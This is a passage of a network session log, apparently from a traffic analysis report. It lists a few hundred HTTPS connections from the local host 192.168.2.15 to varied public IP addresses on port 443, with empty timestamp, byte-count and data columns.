                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12306192.168.2.1553068197.130.235.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12307192.168.2.1536382164.101.185.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12308192.168.2.1543376155.170.203.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12309192.168.2.153333672.1.168.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12310192.168.2.1547390174.9.99.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12311192.168.2.1548204104.222.129.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12312192.168.2.155407454.176.44.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12313192.168.2.154746063.176.182.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12314192.168.2.154391812.7.123.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12315192.168.2.1539316165.71.50.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12316192.168.2.1547416198.56.214.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12317192.168.2.1549234186.11.33.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12318192.168.2.1549638185.102.212.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12319192.168.2.153914253.123.178.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12320192.168.2.1548888124.210.118.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12321192.168.2.154547863.214.197.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12322192.168.2.1538468103.43.2.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12323192.168.2.153401298.214.244.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12324192.168.2.1544192218.63.24.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12325192.168.2.1553160195.124.241.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12326192.168.2.1532834222.160.28.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12327192.168.2.1535854184.59.220.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12328192.168.2.1549960146.120.134.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12329192.168.2.1556276217.176.3.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12330192.168.2.1547948155.25.57.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12331192.168.2.154273673.255.56.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12332192.168.2.155964281.205.121.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12333192.168.2.154460241.38.110.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12334192.168.2.155611685.171.152.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12335192.168.2.155199877.204.192.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12336192.168.2.1549126167.152.155.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12337192.168.2.1542454190.81.229.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12338192.168.2.1555678194.179.89.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12339192.168.2.1552192147.36.220.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12340192.168.2.1540638216.102.69.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12341192.168.2.1540292202.146.21.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12342192.168.2.1553662190.34.109.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12343192.168.2.1549272117.231.167.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12344192.168.2.1556536160.53.85.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12345192.168.2.1534760112.79.95.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12346192.168.2.155866264.155.65.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12347192.168.2.155799487.176.185.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12348192.168.2.15460964.14.69.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12349192.168.2.1540496213.25.137.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12350192.168.2.1547870160.141.99.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12351192.168.2.1540466130.119.6.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12352192.168.2.155006062.5.114.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12353192.168.2.1551132126.248.69.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12354192.168.2.1534004204.178.158.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12355192.168.2.1552074219.22.218.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12356192.168.2.1539604187.236.133.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12357192.168.2.1556064156.246.99.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12358192.168.2.1541480211.29.161.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12359192.168.2.154340647.88.192.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12360192.168.2.155019248.62.169.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12361192.168.2.1550566165.25.197.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12362192.168.2.154040269.222.245.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12363192.168.2.153631889.99.127.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12364192.168.2.155730698.1.1.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12365192.168.2.154198223.76.176.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12366192.168.2.155054285.152.246.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12367192.168.2.155512848.146.75.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12368192.168.2.1538360208.146.101.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12369192.168.2.1538184219.185.100.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12370192.168.2.155230470.136.66.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12371192.168.2.1541382148.131.42.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12372192.168.2.1547898156.172.53.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12373192.168.2.1560542153.26.158.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12374192.168.2.1554538207.114.204.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12375192.168.2.1551206209.136.105.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12376192.168.2.1559606208.192.207.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12377192.168.2.155640295.203.193.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12378192.168.2.1550202168.191.197.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12379192.168.2.154472031.188.31.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12380192.168.2.1533886212.152.113.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12381192.168.2.154623694.56.214.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12382192.168.2.1538310101.62.233.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12383192.168.2.154114495.75.153.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12384192.168.2.1556782150.59.140.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12385192.168.2.1549412165.95.133.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12386192.168.2.155630647.183.101.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12387192.168.2.1555730198.142.211.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12388192.168.2.1538188142.17.87.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12389192.168.2.154750092.31.64.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12390192.168.2.154452242.80.20.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12391192.168.2.1558942160.139.36.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12392192.168.2.1549316217.220.46.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12393192.168.2.155929050.76.5.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12394192.168.2.15576549.220.168.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12395192.168.2.155331846.101.163.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12396192.168.2.155641291.84.63.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12397192.168.2.1545602152.236.227.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12398192.168.2.154545038.120.89.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12399192.168.2.1535974187.199.37.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12400192.168.2.153973266.207.108.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12401192.168.2.154723648.129.42.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12402192.168.2.1544276103.81.21.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12403192.168.2.1549908187.160.52.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12404192.168.2.1552708114.172.154.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12405192.168.2.153881449.229.23.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12406192.168.2.1557472195.225.5.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12407192.168.2.1542108197.161.194.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12408192.168.2.1560462100.180.42.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12409192.168.2.155355432.210.117.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12410192.168.2.154347453.28.43.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12411192.168.2.1536770180.148.53.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12412192.168.2.153538425.239.114.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12413192.168.2.155216690.27.70.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12414192.168.2.1551850196.89.12.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12415192.168.2.1537036171.95.42.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12416192.168.2.1551706133.185.129.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12417192.168.2.1558720198.251.75.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12418192.168.2.1542682110.158.14.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12419192.168.2.153628667.39.188.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12420192.168.2.15514041.83.221.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12421192.168.2.1541498196.220.216.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12422192.168.2.154948850.47.36.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12423192.168.2.153672437.187.190.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12424192.168.2.1532916111.47.56.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12425192.168.2.1535252140.145.192.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12426192.168.2.154811490.73.247.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12427192.168.2.153453832.236.1.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12428192.168.2.1555426136.12.111.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12429192.168.2.1537780133.134.12.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12430192.168.2.1557170146.173.227.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12431192.168.2.1552886155.0.18.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12432192.168.2.155778875.151.202.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12433192.168.2.1546070187.109.19.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12434192.168.2.155343823.101.206.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12435192.168.2.153472074.12.193.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12436192.168.2.15390468.25.133.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12437192.168.2.155910897.190.81.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12438192.168.2.1556298170.210.198.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12439192.168.2.155008246.164.195.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12440192.168.2.156068271.243.146.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12441192.168.2.1544374209.167.58.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12442192.168.2.154641042.175.76.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12443192.168.2.155489478.70.151.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12444192.168.2.154027654.107.214.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12445192.168.2.1543320146.22.58.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12446192.168.2.154786469.100.229.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12447192.168.2.153437298.214.236.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12448192.168.2.1558710130.23.63.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12449192.168.2.1547868129.1.46.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12450192.168.2.154020243.22.7.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12451192.168.2.1552042216.253.85.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12452192.168.2.1547638223.153.65.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12453192.168.2.155766035.244.22.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12454192.168.2.1547490160.232.125.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12455192.168.2.155836682.74.99.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12456192.168.2.154929494.176.165.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12457192.168.2.154910069.24.5.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12458192.168.2.1552174184.129.138.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12459192.168.2.1550010140.245.172.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12460192.168.2.155108466.37.31.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12461192.168.2.1538176117.232.135.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12462192.168.2.1556054129.137.163.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12463192.168.2.1550472136.168.3.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12464192.168.2.154570686.238.25.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12465192.168.2.1541150102.218.28.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12466192.168.2.154467284.30.19.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12467192.168.2.1548472146.168.130.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12468192.168.2.1533380118.252.7.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12469192.168.2.153435285.159.163.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12470192.168.2.1549634206.93.47.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12471192.168.2.153348486.142.254.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12472192.168.2.154086496.219.40.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12473192.168.2.155678077.161.122.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12474192.168.2.1541922189.69.151.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12475192.168.2.154384885.117.202.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12476192.168.2.153339874.52.185.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12477192.168.2.1532944119.29.72.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12478192.168.2.155220818.251.167.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12479192.168.2.155774639.44.79.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12480192.168.2.154296070.25.109.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12481192.168.2.1559976108.104.52.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12482192.168.2.1548534146.200.138.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12483192.168.2.1534176157.214.141.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12484192.168.2.1549566112.241.48.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12485192.168.2.156052073.182.98.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12486192.168.2.1546114186.133.216.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12487192.168.2.155495867.106.243.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12488192.168.2.1539840108.111.57.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12489192.168.2.1558872216.4.52.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12490192.168.2.154448486.75.218.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12491192.168.2.154550073.107.83.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12492192.168.2.154786090.99.123.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12493192.168.2.1549112112.0.82.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12494192.168.2.1560276199.190.113.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12495192.168.2.153702453.178.160.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12496192.168.2.153349865.143.140.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12497192.168.2.1556572194.193.156.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12498192.168.2.153917846.227.233.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12499192.168.2.155831234.25.248.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12500192.168.2.1545902200.122.188.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12501192.168.2.1533340110.165.202.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12502192.168.2.1540522195.165.31.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12503192.168.2.1555818208.87.116.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12504192.168.2.1559810174.62.122.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12505192.168.2.1554924150.158.24.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12506192.168.2.1545426128.130.5.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12507192.168.2.1541998121.76.156.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12508192.168.2.1547408155.162.60.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12509192.168.2.1545676101.206.62.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12510192.168.2.1540088115.204.95.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12511192.168.2.1551612103.149.30.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12512192.168.2.1546922132.121.236.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12513192.168.2.1555608117.190.27.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12514192.168.2.155657868.218.161.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12515192.168.2.1554632114.42.142.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12516192.168.2.1536862113.26.227.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12517192.168.2.1547346118.65.128.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12518192.168.2.1546276155.174.134.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12519192.168.2.154776647.145.3.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12520192.168.2.1558164147.10.137.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12521192.168.2.15423869.91.81.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12522192.168.2.153354489.108.116.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12523192.168.2.1553292152.246.39.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12524192.168.2.155981457.0.151.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12525192.168.2.1558584202.132.195.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12526192.168.2.1554434216.105.35.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12527192.168.2.1545728184.236.242.192443
